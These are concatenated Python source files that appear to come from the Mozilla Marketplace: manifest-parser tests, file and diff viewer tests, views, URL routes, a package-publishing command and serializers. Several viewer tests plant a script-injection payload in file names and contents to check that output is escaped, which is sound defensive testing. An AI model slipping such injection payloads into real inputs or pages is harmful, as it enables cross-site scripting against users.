        eq_(e.exception.messages, ["Developer name is required in the manifest"
                                   " in order to display it on the app's "
                                   "listing."])

    @mock.patch('files.utils.WebAppParser.get_json_data')
    def test_empty_developer_object(self, get_json_data):
        # 'developer' present but without a 'name' -> same validation error.
        get_json_data.return_value = {
            'name': 'Blah',
            'developer': {}
        }
        with self.assertRaises(forms.ValidationError) as e:
            # The argument to parse() is supposed to be a filename, it doesn't
            # matter here though since we are mocking get_json_data().
            WebAppParser().parse('')
        eq_(e.exception.messages, ["Developer name is required in the manifest"
                                   " in order to display it on the app's "
                                   "listing."])

    @mock.patch('files.utils.WebAppParser.get_json_data')
    def test_developer_name(self, get_json_data):
        get_json_data.return_value = {
            'name': 'Blah',
            'developer': {
                'name': 'Mozilla Marketplace Testing'
            }
        }
        # The argument to parse() is supposed to be a filename, it doesn't
        # matter here though since we are mocking get_json_data().
        parsed_results = WebAppParser().parse('')
        eq_(parsed_results['developer_name'], 'Mozilla Marketplace Testing')

    @mock.patch('files.utils.WebAppParser.get_json_data')
    def test_name_with_translations(self, get_json_data):
        # Each locale with a 'name' entry gets its own translation; locales
        # not listed come back as None.
        get_json_data.return_value = {
            'name': 'Blah',
            'developer': {
                'name': 'Mozilla Marketplace Testing'
            },
            'default_locale': 'en-US',
            'locales': {
                'fr': {
                    'name': 'Blah (fr)',
                },
                'es': {
                    'name': 'Blah (es)',
                }
            }
        }
        # The argument to parse() is supposed to be a filename, it doesn't
        # matter here though since we are mocking get_json_data().
        parsed_results = WebAppParser().parse('')
        eq_(parsed_results['name'].get('fr'), 'Blah (fr)')
        eq_(parsed_results['name'].get('es'), 'Blah (es)')
        eq_(parsed_results['name'].get('en-US'), 'Blah')
        eq_(parsed_results['name'].get('de'), None)
        eq_(parsed_results['default_locale'], 'en-US')

    @mock.patch('files.utils.WebAppParser.get_json_data')
    def test_name_with_translations_fallback(self, get_json_data):
        # A locale that only overrides 'description' falls back to the
        # default-locale 'name'.
        get_json_data.return_value = {
            'name': 'Blah',
            'description': 'Blah Description',
            'developer': {
                'name': 'Mozilla Marketplace Testing'
            },
            'default_locale': 'en-US',
            'locales': {
                'fr': {
                    'description': 'Blah Description (fr)',
                },
                'es': {
                    'name': 'Blah (es)',
                }
            }
        }
        # The argument to parse() is supposed to be a filename, it doesn't
        # matter here though since we are mocking get_json_data().
        parsed_results = WebAppParser().parse('')
        eq_(parsed_results['name'].get('fr'), 'Blah')  # Falls back to default.
        eq_(parsed_results['name'].get('es'), 'Blah (es)')
        eq_(parsed_results['name'].get('en-US'), 'Blah')
        eq_(parsed_results['name'].get('de'), None)
        eq_(parsed_results['default_locale'], 'en-US')
########NEW FILE########
__FILENAME__ = test_views
import json
import os
import shutil
import urlparse
from django.conf import settings
from django.core.cache import cache
from django.core.urlresolvers import reverse
from django.utils.http import http_date
from mock import patch
from nose import SkipTest
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo
import amo.tests
from cache_nuggets.lib import Message
from files.models import File
from mkt.files.helpers import DiffHelper, FileViewer
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from users.models import UserProfile
# Fixture package copied into place for every File created in these tests.
packaged_app = 'mkt/submit/tests/packaged/full-tpa.zip'
# Representative text and binary entries inside that package.
not_binary = 'manifest.webapp'
binary = 'icons/256.png'
class FilesBase(object):
    """Shared setup and access-control tests for the file/diff viewer pages.

    Subclasses (single-file and diff variants) must provide poll_url(),
    file_url() and check_urls(), and may replace self.file_viewer in setUp().
    """

    def login_as_editor(self):
        assert self.client.login(username='[email protected]',
                                 password='password')

    def setUp(self):
        self.app = Webapp.objects.get(pk=337141)
        self.app.update(is_packaged=True, status=amo.WEBAPPS_UNREVIEWED_STATUS)
        self.dev = self.app.authors.all()[0]
        self.regular = UserProfile.objects.get(pk=999)
        self.version = self.app.versions.latest()
        self.file = self.version.all_files[0]

        # Two versions, one file each (Marketplace is one file per version).
        self.versions = [self.version,
                         self.app.versions.create(
                             version='%s.1' % self.version.version)]

        self.files = [self.file,
                      File.objects.create(version=self.versions[1],
                                          filename='webapp.zip')]

        self.login_as_editor()

        # Copy the fixture package into place for each File on disk.
        for file_obj in self.files:
            src = os.path.join(settings.ROOT, packaged_app)
            try:
                os.makedirs(os.path.dirname(file_obj.file_path))
            except OSError:
                # Directory already exists.
                pass
            shutil.copyfile(src, file_obj.file_path)

        self.file_viewer = FileViewer(self.file)

    def tearDown(self):
        self.file_viewer.cleanup()

    def files_redirect(self, file):
        return reverse('mkt.files.redirect', args=[self.file.pk, file])

    def files_serve(self, file):
        return reverse('mkt.files.serve', args=[self.file.pk, file])

    def test_view_access_anon(self):
        self.client.logout()
        self.check_urls(403)

    def test_view_access_anon_view_unreviewed_source(self):
        # view_source alone is not enough while the app is unreviewed.
        self.app.update(view_source=True)
        self.file_viewer.extract()
        self.client.logout()
        self.check_urls(403)

    def test_view_access_anon_view_source(self):
        self.app.update(view_source=True, status=amo.STATUS_PUBLIC)
        self.file_viewer.extract()
        self.client.logout()
        self.check_urls(200)

    def test_view_access_editor(self):
        self.file_viewer.extract()
        self.check_urls(200)

    def test_view_access_editor_view_source(self):
        self.app.update(view_source=True)
        self.file_viewer.extract()
        self.check_urls(200)

    def test_view_access_developer(self):
        self.client.logout()
        assert self.client.login(username=self.dev.email, password='password')
        self.file_viewer.extract()
        self.check_urls(200)

    def test_view_access_reviewed(self):
        # Anonymous view_source access flips with the review status.
        self.app.update(view_source=True)
        self.file_viewer.extract()
        self.client.logout()

        for status in amo.UNREVIEWED_STATUSES:
            self.app.update(status=status)
            self.check_urls(403)

        for status in amo.REVIEWED_STATUSES:
            self.app.update(status=status)
            self.check_urls(200)

    def test_view_access_developer_view_source(self):
        self.client.logout()
        assert self.client.login(username=self.dev.email, password='password')
        self.app.update(view_source=True)
        self.file_viewer.extract()
        self.check_urls(200)

    def test_view_access_another_developer(self):
        # A developer of a *different* app has no special access.
        self.client.logout()
        assert self.client.login(username=self.regular.email,
                                 password='password')
        self.file_viewer.extract()
        self.check_urls(403)

    def test_view_access_another_developer_view_source(self):
        self.client.logout()
        assert self.client.login(username=self.regular.email,
                                 password='password')
        self.app.update(view_source=True, status=amo.STATUS_PUBLIC)
        self.file_viewer.extract()
        self.check_urls(200)

    def test_poll_extracted(self):
        self.file_viewer.extract()
        res = self.client.get(self.poll_url())
        eq_(res.status_code, 200)
        eq_(json.loads(res.content)['status'], True)

    def test_poll_not_extracted(self):
        res = self.client.get(self.poll_url())
        eq_(res.status_code, 200)
        eq_(json.loads(res.content)['status'], False)

    def test_poll_extracted_anon(self):
        self.client.logout()
        res = self.client.get(self.poll_url())
        eq_(res.status_code, 403)

    def test_content_headers(self):
        self.file_viewer.extract()
        res = self.client.get(self.file_url('manifest.webapp'))
        assert 'etag' in res._headers
        assert 'last-modified' in res._headers

    def test_content_headers_etag(self):
        # The ETag is the md5 of the selected file; conditional GET -> 304.
        self.file_viewer.extract()
        self.file_viewer.select('manifest.webapp')
        obj = getattr(self.file_viewer, 'left', self.file_viewer)
        etag = obj.selected.get('md5')
        res = self.client.get(self.file_url('manifest.webapp'),
                              HTTP_IF_NONE_MATCH=etag)
        eq_(res.status_code, 304)

    def test_content_headers_if_modified(self):
        self.file_viewer.extract()
        self.file_viewer.select('manifest.webapp')
        obj = getattr(self.file_viewer, 'left', self.file_viewer)
        date = http_date(obj.selected.get('modified'))
        res = self.client.get(self.file_url('manifest.webapp'),
                              HTTP_IF_MODIFIED_SINCE=date)
        eq_(res.status_code, 304)

    def test_file_header(self):
        # Editors get a "back to review" link.
        self.file_viewer.extract()
        res = self.client.get(self.file_url(not_binary))
        eq_(res.status_code, 200)
        url = res.context['file_link']['url']
        eq_(url, reverse('reviewers.apps.review', args=[self.app.app_slug]))

    def test_file_header_anon(self):
        # Anonymous visitors get a "back to app" link instead.
        self.client.logout()
        self.file_viewer.extract()
        self.app.update(view_source=True, status=amo.STATUS_PUBLIC)
        res = self.client.get(self.file_url(not_binary))
        eq_(res.status_code, 200)
        url = res.context['file_link']['url']
        eq_(url, reverse('detail', args=[self.app.pk]))

    def test_content_no_file(self):
        self.file_viewer.extract()
        res = self.client.get(self.file_url())
        doc = pq(res.content)
        eq_(len(doc('#content')), 0)

    def test_no_files(self):
        self.file_viewer.cleanup()
        res = self.client.get(self.file_url())
        eq_(res.status_code, 200)
        assert 'files' in res.context

    def test_files(self):
        self.file_viewer.extract()
        res = self.client.get(self.file_url())
        eq_(res.status_code, 200)
        assert 'files' in res.context

    def test_files_anon(self):
        self.client.logout()
        res = self.client.get(self.file_url())
        eq_(res.status_code, 403)

    def test_files_file(self):
        self.file_viewer.extract()
        res = self.client.get(self.file_url(not_binary))
        eq_(res.status_code, 200)
        assert 'selected' in res.context

    def test_files_back_link(self):
        self.file_viewer.extract()
        res = self.client.get(self.file_url(not_binary))
        doc = pq(res.content)
        eq_(doc('#commands td:last').text(), 'Back to review')

    def test_files_back_link_anon(self):
        self.file_viewer.extract()
        self.client.logout()
        self.app.update(view_source=True, status=amo.STATUS_PUBLIC)
        res = self.client.get(self.file_url(not_binary))
        eq_(res.status_code, 200)
        doc = pq(res.content)
        eq_(doc('#commands td:last').text(), 'Back to app')

    def test_diff_redirect(self):
        # POSTing both sides of the compare form redirects to the diff view.
        ids = self.files[0].id, self.files[1].id

        res = self.client.post(self.file_url(),
                               {'left': ids[0], 'right': ids[1]})
        eq_(res.status_code, 302)
        self.assert3xx(res, reverse('mkt.files.compare', args=ids))

    def test_browse_redirect(self):
        # POSTing only the left side redirects to the single-file browser.
        ids = self.files[0].id,

        res = self.client.post(self.file_url(), {'left': ids[0]})
        eq_(res.status_code, 302)
        self.assert3xx(res, reverse('mkt.files.list', args=ids))

    def test_browse_deleted_version(self):
        self.file.version.delete()
        res = self.client.post(self.file_url(), {'left': self.file.id})
        eq_(res.status_code, 404)

    def test_file_chooser(self):
        res = self.client.get(self.file_url())
        doc = pq(res.content)

        left = doc('#id_left')
        eq_(len(left), 1)

        vers = left('option')
        eq_(len(vers), 3)

        # Only one file per version on Marketplace for the time being.
        eq_(vers.eq(0).text(), '')
        f = self.versions[1].all_files[0]
        eq_(vers.eq(1).text(), '%s (%s)' % (self.versions[1].version,
                                            amo.STATUS_CHOICES_API[f.status]))
        f = self.versions[0].all_files[0]
        eq_(vers.eq(2).text(), '%s (%s)' % (self.versions[0].version,
                                            amo.STATUS_CHOICES_API[f.status]))
class TestFileViewer(FilesBase, amo.tests.WebappTestCase):
    """File viewer pages for a single package (no diff)."""
    fixtures = ['base/apps', 'base/users'] + fixture('webapp_337141')

    def poll_url(self):
        """URL polled by the frontend for extraction status."""
        return reverse('mkt.files.poll', args=[self.file.pk])

    def file_url(self, file=None):
        """Build the file listing URL, optionally for one file inside it."""
        args = [self.file.pk]
        if file:
            args.extend(['file', file])
        return reverse('mkt.files.list', args=args)

    def check_urls(self, status):
        """Assert both viewer URLs return the given status code."""
        for url in [self.poll_url(), self.file_url()]:
            status_code = self.client.get(url).status_code
            assert status_code == status, (
                'Request to %s returned status code %d (expected %d)' %
                (url, status_code, status))

    def add_file(self, name, contents):
        """Drop an extra file into the extracted package tree."""
        dest = os.path.join(self.file_viewer.dest, name)
        # Fix: use a context manager so the handle is closed deterministically
        # (the previous open(...).write(...) leaked the file object).
        with open(dest, 'w') as fh:
            fh.write(contents)

    def test_files_xss(self):
        self.file_viewer.extract()
        self.add_file('<script>alert("foo")', '')
        res = self.client.get(self.file_url())
        eq_(res.status_code, 200)
        doc = pq(res.content)
        # Note: this is text, not a DOM element, so escaped correctly.
        assert '<script>alert("' in doc('#files li a').text()

    def test_content_file(self):
        self.file_viewer.extract()
        res = self.client.get(self.file_url('manifest.webapp'))
        doc = pq(res.content)
        eq_(len(doc('#content')), 1)

    def test_content_no_file(self):
        # With no file selected, the manifest is shown by default.
        self.file_viewer.extract()
        res = self.client.get(self.file_url())
        doc = pq(res.content)
        eq_(len(doc('#content')), 1)
        eq_(res.context['key'], 'manifest.webapp')

    def test_content_xss(self):
        self.file_viewer.extract()
        for name in ['file.txt', 'file.html', 'file.htm']:
            # If you are adding files, you need to clear out the memcache
            # file listing.
            cache.clear()
            self.add_file(name, '<script>alert("foo")</script>')
            res = self.client.get(self.file_url(name))
            doc = pq(res.content)
            # Note: this is text, not a DOM element, so escaped correctly.
            assert doc('#content').text().startswith('<script')

    def test_binary(self):
        self.file_viewer.extract()
        self.add_file('file.php', '<script>alert("foo")</script>')
        res = self.client.get(self.file_url('file.php'))
        eq_(res.status_code, 200)
        assert self.file_viewer.get_files()['file.php']['md5'] in res.content

    def test_tree_no_file(self):
        self.file_viewer.extract()
        res = self.client.get(self.file_url('doesnotexist.js'))
        eq_(res.status_code, 404)

    def test_directory(self):
        self.file_viewer.extract()
        res = self.client.get(self.file_url('doesnotexist.js'))
        eq_(res.status_code, 404)

    def test_serve_no_token(self):
        self.file_viewer.extract()
        res = self.client.get(self.files_serve(binary))
        eq_(res.status_code, 403)

    def test_serve_fake_token(self):
        self.file_viewer.extract()
        res = self.client.get(self.files_serve(binary) + '?token=aasd')
        eq_(res.status_code, 403)

    def test_serve_bad_token(self):
        self.file_viewer.extract()
        res = self.client.get(self.files_serve(binary) + '?token=a asd')
        eq_(res.status_code, 403)

    def test_serve_get_token(self):
        self.file_viewer.extract()
        res = self.client.get(self.files_redirect(binary))
        eq_(res.status_code, 302)
        url = res['Location']
        assert url.startswith(settings.STATIC_URL)
        assert urlparse.urlparse(url).query.startswith('token=')

    def test_memcache_goes_bye_bye(self):
        # Wiping the cache invalidates an otherwise-valid token.
        self.file_viewer.extract()
        res = self.client.get(self.files_redirect(binary))
        url = res['Location'][len(settings.STATIC_URL) - 1:]
        cache.clear()
        res = self.client.get(url)
        eq_(res.status_code, 403)

    def test_bounce(self):
        # Don't run this test if the server has x-sendfile turned off.
        if not settings.XSENDFILE:
            raise SkipTest()

        self.file_viewer.extract()
        res = self.client.get(self.files_redirect(binary), follow=True)
        eq_(res.status_code, 200)
        eq_(res[settings.XSENDFILE_HEADER],
            self.file_viewer.get_files().get(binary)['full'])

    @patch.object(settings, 'FILE_VIEWER_SIZE_LIMIT', 5)
    def test_file_size(self):
        self.file_viewer.extract()
        res = self.client.get(self.file_url(not_binary))
        doc = pq(res.content)
        assert doc('.error').text().startswith('File size is')

    def test_poll_failed(self):
        # An error message saved under the viewer key is returned once.
        msg = Message('file-viewer:%s' % self.file_viewer)
        msg.save('I like cheese.')
        res = self.client.get(self.poll_url())
        eq_(res.status_code, 200)
        data = json.loads(res.content)
        eq_(data['status'], False)
        eq_(data['msg'], ['I like cheese.'])

    def test_file_chooser_selection(self):
        res = self.client.get(self.file_url())
        doc = pq(res.content)

        eq_(doc('#id_left option[selected]').attr('value'),
            str(self.files[0].id))
        eq_(len(doc('#id_right option[value][selected]')), 0)
class TestDiffViewer(FilesBase, amo.tests.WebappTestCase):
    """Side-by-side diff viewer between two versions of a package."""
    fixtures = ['base/apps', 'base/users'] + fixture('webapp_337141')

    def setUp(self):
        super(TestDiffViewer, self).setUp()
        self.file_viewer = DiffHelper(self.files[0], self.files[1])

    def poll_url(self):
        """URL polled by the frontend for extraction status of both sides."""
        return reverse('mkt.files.compare.poll', args=[self.files[0].pk,
                                                       self.files[1].pk])

    def add_file(self, file_obj, name, contents):
        """Drop an extra file into one side of the diff."""
        dest = os.path.join(file_obj.dest, name)
        # Fix: close the handle deterministically via a context manager
        # (the previous open(...).write(...) leaked the file object).
        with open(dest, 'w') as fh:
            fh.write(contents)

    def file_url(self, file=None):
        """Build the compare URL, optionally for one file inside the diff."""
        args = [self.files[0].pk, self.files[1].pk]
        if file:
            args.extend(['file', file])
        return reverse('mkt.files.compare', args=args)

    def check_urls(self, status):
        """Assert both diff URLs return the given status code."""
        for url in [self.poll_url(), self.file_url()]:
            status_code = self.client.get(url).status_code
            assert status_code == status, (
                'Request to %s returned status code %d (expected %d)' %
                (url, status_code, status))

    def test_tree_no_file(self):
        self.file_viewer.extract()
        res = self.client.get(self.file_url('doesnotexist.js'))
        eq_(res.status_code, 404)

    def test_content_file(self):
        self.file_viewer.extract()
        res = self.client.get(self.file_url(not_binary))
        doc = pq(res.content)
        eq_(len(doc('pre')), 3)

    def test_binary_serve_links(self):
        self.file_viewer.extract()
        res = self.client.get(self.file_url(binary))
        doc = pq(res.content)
        node = doc('#content-wrapper a')
        eq_(len(node), 2)
        assert node[0].text.startswith('Download 256.png')

    def test_view_both_present(self):
        self.file_viewer.extract()
        res = self.client.get(self.file_url(not_binary))
        doc = pq(res.content)
        eq_(len(doc('pre')), 3)
        eq_(len(doc('#content-wrapper p')), 4)

    def test_view_one_missing(self):
        self.file_viewer.extract()
        os.remove(os.path.join(self.file_viewer.right.dest, 'manifest.webapp'))
        res = self.client.get(self.file_url(not_binary))
        doc = pq(res.content)
        eq_(len(doc('pre')), 3)
        eq_(len(doc('#content-wrapper p')), 2)

    def test_view_left_binary(self):
        self.file_viewer.extract()
        filename = os.path.join(self.file_viewer.left.dest, 'manifest.webapp')
        # 'MZ' makes the file look binary to the viewer.  Fix: with-block
        # replaces a leaked open(...).write(...) handle.
        with open(filename, 'w') as fh:
            fh.write('MZ')
        res = self.client.get(self.file_url(not_binary))
        assert 'This file is not viewable online' in res.content

    def test_view_right_binary(self):
        self.file_viewer.extract()
        filename = os.path.join(self.file_viewer.right.dest, 'manifest.webapp')
        with open(filename, 'w') as fh:
            fh.write('MZ')
        assert not self.file_viewer.is_diffable()
        res = self.client.get(self.file_url(not_binary))
        assert 'This file is not viewable online' in res.content

    def test_different_tree(self):
        self.file_viewer.extract()
        os.remove(os.path.join(self.file_viewer.left.dest, not_binary))
        res = self.client.get(self.file_url(not_binary))
        doc = pq(res.content)
        eq_(doc('h4:last').text(), 'Deleted files:')
        eq_(len(doc('ul.root')), 2)

    def test_file_chooser_selection(self):
        res = self.client.get(self.file_url())
        doc = pq(res.content)

        eq_(doc('#id_left option[selected]').attr('value'),
            str(self.files[0].id))
        eq_(doc('#id_right option[selected]').attr('value'),
            str(self.files[1].id))
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from . import views
# URL routes for the file viewer.  Fix: all regex patterns are raw strings;
# '\d' and '\.' in plain string literals are invalid escape sequences
# (DeprecationWarning, and a SyntaxError from Python 3.12 onward).
file_patterns = patterns('',
    url(r'^$', views.browse, name='mkt.files.list'),
    url(r'^(?P<type_>fragment|file)/(?P<key>.*)$', views.browse,
        name='mkt.files.list'),
    url(r'file-redirect/(?P<key>.*)$', views.redirect,
        name='mkt.files.redirect'),
    url(r'file-serve/(?P<key>.*)$', views.serve, name='mkt.files.serve'),
    url(r'status$', views.poll, name='mkt.files.poll'),
)

compare_patterns = patterns('',
    url(r'^$', views.compare, name='mkt.files.compare'),
    url(r'(?P<type_>fragment|file)/(?P<key>.*)$', views.compare,
        name='mkt.files.compare'),
    url(r'status$', views.compare_poll, name='mkt.files.compare.poll'),
)

urlpatterns = patterns('',
    # Single-file browser: /browse/<file_id>/...
    (r'^browse/(?P<file_id>\d+)/', include(file_patterns)),
    # Diff browser: /compare/<one_id>...<two_id>/
    (r'^compare/(?P<one_id>\d+)\.{3}(?P<two_id>\d+)/',
     include(compare_patterns)),
)
########NEW FILE########
__FILENAME__ = views
from urlparse import urljoin
from django import http, shortcuts
from django.conf import settings
from django.core.urlresolvers import reverse
from django.shortcuts import render
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import condition
import commonware.log
from cache_nuggets.lib import Message, Token
from tower import ugettext as _
from access import acl
from amo.decorators import json_view
from amo.utils import HttpResponseSendFile, urlparams
from files import forms
from files.decorators import (etag, webapp_file_view, compare_webapp_file_view,
webapp_file_view_token, last_modified)
from files.tasks import extract_file
log = commonware.log.getLogger('z.addons')
def setup_viewer(request, file_obj):
    """Build the common template context for the file viewer pages."""
    addon = file_obj.version.addon
    data = {
        'file': file_obj,
        'version': file_obj.version,
        'addon': addon,
        'status': False,
        'selected': {},
        'validate_url': '',
    }

    # Reviewers and (even disabled-app) owners get a validation endpoint.
    if (acl.check_reviewer(request) or
        acl.check_addon_ownership(request, addon,
                                  viewer=True, ignore_disabled=True)):
        data['validate_url'] = reverse(
            'mkt.developers.apps.json_file_validation',
            args=[addon.app_slug, file_obj.id])

    if acl.check_reviewer(request):
        link = {'text': _('Back to review'),
                'url': reverse('reviewers.apps.review',
                               args=[addon.app_slug])}
    else:
        link = {'text': _('Back to app'),
                'url': reverse('detail', args=[addon.pk])}
    data['file_link'] = link
    return data
@never_cache
@json_view
@webapp_file_view
def poll(request, viewer):
    """Report whether the viewer's package has been extracted yet."""
    # Any pending extraction error message is consumed (delete=True).
    message = Message('file-viewer:%s' % viewer).get(delete=True)
    return {'status': viewer.is_extracted(), 'msg': [message]}
def check_compare_form(request, form):
    """On POST, redirect to the compare or list view; otherwise return None."""
    if request.method != 'POST':
        return None
    if not form.is_valid():
        # Invalid form: bounce back to the current page.
        return shortcuts.redirect(request.path)
    left = form.cleaned_data['left']
    right = form.cleaned_data.get('right')
    if right:
        target = reverse('mkt.files.compare', args=[left, right])
    else:
        target = reverse('mkt.files.list', args=[left])
    return shortcuts.redirect(target)
@csrf_exempt
@webapp_file_view
@condition(etag_func=etag, last_modified_func=last_modified)
def browse(request, viewer, key=None, type_='file'):
    # Browse one file inside a package.  `viewer` is injected by the
    # @webapp_file_view decorator; `key` is the file's path inside the
    # package; `type_` selects the full page ('file') or an HTML fragment.
    form = forms.FileCompareForm(request.POST or None, addon=viewer.addon,
                                 initial={'left': viewer.file})
    response = check_compare_form(request, form)
    if response:
        return response

    data = setup_viewer(request, viewer.file)
    data['viewer'] = viewer
    data['poll_url'] = reverse('mkt.files.poll', args=[viewer.file.id])
    data['form'] = form

    if not viewer.is_extracted():
        # Direct call runs the task eagerly; presumably a fast-path attempt
        # before falling back to async below — TODO confirm.
        extract_file(viewer)

    if viewer.is_extracted():
        data.update({'status': True, 'files': viewer.get_files()})
        key = viewer.get_default(key)
        if key not in data['files']:
            raise http.Http404

        viewer.select(key)
        data['key'] = key
        binary = viewer.is_binary()
        # Images are rendered via a URL, not inline content.
        if (not viewer.is_directory() and
            (not binary or binary != 'image')):
            data['content'] = viewer.read_file()
    else:
        # Still not extracted: queue it and let the page poll for status.
        extract_file.delay(viewer)

    tmpl = 'content' if type_ == 'fragment' else 'viewer'
    return render(request, 'fileviewer/%s.html' % tmpl, data)
@never_cache
@compare_webapp_file_view
@json_view
def compare_poll(request, diff):
    """Report extraction status for both sides of a diff."""
    msgs = []
    for side in (diff.left, diff.right):
        # Consume any pending extraction error for this side.
        note = Message('file-viewer:%s' % side).get(delete=True)
        if note:
            msgs.append(note)
    return {'status': diff.is_extracted(), 'msg': msgs}
@csrf_exempt
@compare_webapp_file_view
@condition(etag_func=etag, last_modified_func=last_modified)
def compare(request, diff, key=None, type_='file'):
    # Diff view between two package files.  `diff` is injected by the
    # @compare_webapp_file_view decorator.
    form = forms.FileCompareForm(request.POST or None, addon=diff.addon,
                                 initial={'left': diff.left.file,
                                          'right': diff.right.file})
    response = check_compare_form(request, form)
    if response:
        return response

    data = setup_viewer(request, diff.left.file)
    data['diff'] = diff
    data['poll_url'] = reverse('mkt.files.compare.poll',
                               args=[diff.left.file.id,
                                     diff.right.file.id])
    data['form'] = form

    if not diff.is_extracted():
        # Eager extraction attempt for both sides before async fallback.
        extract_file(diff.left)
        extract_file(diff.right)

    if diff.is_extracted():
        data.update({'status': True,
                     'files': diff.get_files(),
                     'files_deleted': diff.get_deleted_files()})
        key = diff.left.get_default(key)
        if key not in data['files'] and key not in data['files_deleted']:
            raise http.Http404

        diff.select(key)
        data['key'] = key
        if diff.is_diffable():
            data['left'], data['right'] = diff.read_file()
    else:
        # Not extracted yet: queue both sides, the page will poll.
        extract_file.delay(diff.left)
        extract_file.delay(diff.right)

    tmpl = 'content' if type_ == 'fragment' else 'viewer'
    return render(request, 'fileviewer/%s.html' % tmpl, data)
@webapp_file_view
def redirect(request, viewer, key):
    """Issue a one-time token and redirect to the static file server."""
    token = Token(data=[viewer.file.id, key])
    token.save()
    target = urljoin(settings.STATIC_URL,
                     reverse('mkt.files.serve', args=[viewer, key]))
    return http.HttpResponseRedirect(urlparams(target, token=token.token))
@webapp_file_view_token
def serve(request, viewer, key):
    """
    This is to serve files off of st.a.m.o, not standard a.m.o. For this we
    use token based authentication.
    """
    files = viewer.get_files()
    obj = files.get(key)
    if not obj:
        # Log only the first 10 entries to keep the message manageable.
        log.error(u'Couldn\'t find %s in %s (%d entries) for file %s' %
                  (key, files.keys()[:10], len(files.keys()), viewer.file.id))
        raise http.Http404()
    return HttpResponseSendFile(request, obj['full'],
                                content_type=obj['mimetype'])
########NEW FILE########
__FILENAME__ = upload_new_marketplace_package
import os
import os.path
from datetime import datetime
from django.core.management.base import BaseCommand, CommandError
from django.db import transaction, connections
import commonware.log
import amo
from amo.decorators import use_master
from files.models import FileUpload
from mkt.webapps.models import Webapp
from versions.models import Version
log = commonware.log.getLogger('mkt.fireplace.commands')
class Command(BaseCommand):
    help = ('Upload and sign a new version of the Marketplace packaged app.\n'
            'Syntax:\n./manage.py upload_new_marketplace_package <path-to-zip>')

    def info(self, msg):
        """Log *msg* and echo it to stdout immediately."""
        log.info(msg)
        self.stdout.write(msg)
        self.stdout.flush()

    def upload(self, addon, path):
        """Create FileUpload instance from local file."""
        self.info('Creating FileUpload...')
        package_size = os.stat(path).st_size
        # Fix: read the package inside a with-block so the handle is closed
        # (the previous code opened the file and never closed it).
        with open(path) as package_file:
            contents = package_file.read()
        upload = FileUpload()
        # The first author of the app owns the upload.
        upload.user = addon.authors.all()[0]
        upload.add_file(contents, 'marketplace-package.zip',
                        package_size, is_webapp=True)
        self.info('Created FileUpload %s.' % upload)
        return upload

    def create_version(self, addon, upload):
        """Create new Version instance from a FileUpload instance"""
        self.info('Creating new Version...')
        version = Version.from_upload(upload, addon, [amo.PLATFORM_ALL])
        self.info('Created new Version %s.' % version)
        return version

    def sign_and_publicise(self, addon, version):
        """Sign the version we just created and make it public."""
        # Note: most of this is lifted from mkt/reviewers/utils.py, but without
        # the dependency on `request` and isolating only what we need.
        self.info('Signing version...')
        addon.sign_if_packaged(version.pk)
        self.info('Signing version %s done.' % version)

        self.info('Setting File to public...')
        file_ = version.all_files[0]
        # _signal=False: avoid triggering status-change signal handlers.
        file_.update(_signal=False, datestatuschanged=datetime.now(),
                     reviewed=datetime.now(), status=amo.STATUS_PUBLIC)
        self.info('File for version %s set to public.' % version)

        self.info('Setting version %s as the current version...' % version)
        version.update(_signal=False, reviewed=datetime.now())
        addon.update_version(_signal=False)
        self.info('Set version %s as the current version.' % version)

    @use_master
    def handle(self, *args, **options):
        try:
            path = args[0]
        except IndexError:
            raise CommandError(self.help)
        if not path.endswith('.zip'):
            raise CommandError('File does not look like a zip file.')
        if not os.path.exists(path):
            raise CommandError('File does not exist')

        addon = Webapp.objects.get(app_slug='marketplace-package')

        # Wrap everything we're doing in a transaction, if there is an uncaught
        # exception everything will be rolled back. We force a connect() call
        # first to work around django-mysql-pool problems (autocommit state is
        # not properly reset, messing up transaction.atomic() blocks).
        connections['default'].connect()
        with transaction.atomic():
            upload = self.upload(addon, path)
            version = self.create_version(addon, upload)
            self.sign_and_publicise(addon, version)
        # '\\o' escaped explicitly; '\o' in a plain string is an invalid
        # escape sequence (same runtime bytes, no DeprecationWarning).
        self.info('Excellent! Version %s is the now live \\o/' % version)
########NEW FILE########
__FILENAME__ = serializers
from rest_framework.serializers import SerializerMethodField
from mkt.collections.serializers import (CollectionSerializer,
CollectionMembershipField)
from mkt.search.serializers import SimpleESAppSerializer
from mkt.webapps.serializers import SimpleAppSerializer
class BaseFireplaceAppSerializer(object):
    """Mixin limiting serialized icons to the single size Fireplace uses."""

    # Fireplace only requires 64px-sized icons.
    ICON_SIZE = 64

    def get_icons(self, app):
        """Return a {size: url} mapping containing only the 64px icon."""
        return {self.ICON_SIZE: app.get_icon_url(self.ICON_SIZE)}
class FireplaceAppSerializer(BaseFireplaceAppSerializer, SimpleAppSerializer):
    # Serializer used by the Fireplace frontend for DB-backed app objects.

    class Meta(SimpleAppSerializer.Meta):
        # Explicit whitelist of fields exposed to Fireplace.
        fields = ['author', 'banner_message', 'banner_regions', 'categories',
                  'content_ratings', 'current_version', 'description',
                  'device_types', 'homepage', 'icons', 'id', 'is_packaged',
                  'manifest_url', 'name', 'payment_required', 'premium_type',
                  'previews', 'price', 'price_locale', 'privacy_policy',
                  'public_stats', 'release_notes', 'ratings', 'slug', 'status',
                  'support_email', 'support_url', 'upsell', 'user']
        # Empty on purpose: `fields` already restricts the output.
        exclude = []
class FireplaceESAppSerializer(BaseFireplaceAppSerializer,
                               SimpleESAppSerializer):
    """Elasticsearch-backed app serializer for Fireplace search."""

    # Ranking weight pulled from the ES document (see get_weight()).
    weight = SerializerMethodField('get_weight')

    class Meta(SimpleESAppSerializer.Meta):
        # Same whitelist as the non-ES serializer, plus the weight field.
        fields = sorted(FireplaceAppSerializer.Meta.fields + ['weight'])
        exclude = FireplaceAppSerializer.Meta.exclude

    def get_weight(self, obj):
        # Default to a neutral weight of 1 when ES has none recorded.
        return obj.es_data.get('weight', 1)

    def get_user_info(self, app):
        # Fireplace search should always be anonymous for extra-cacheability.
        return None
class FireplaceCollectionMembershipField(CollectionMembershipField):
    """Membership field that serializes collection apps with the
    Fireplace serializers (ES-backed or database-backed)."""
    app_serializer_classes = {
        'es': FireplaceESAppSerializer,
        'normal': FireplaceAppSerializer,
    }
class FireplaceCollectionSerializer(CollectionSerializer):
    """Collection serializer whose apps use the Fireplace field set."""
    apps = FireplaceCollectionMembershipField(many=True, source='apps')
########NEW FILE########
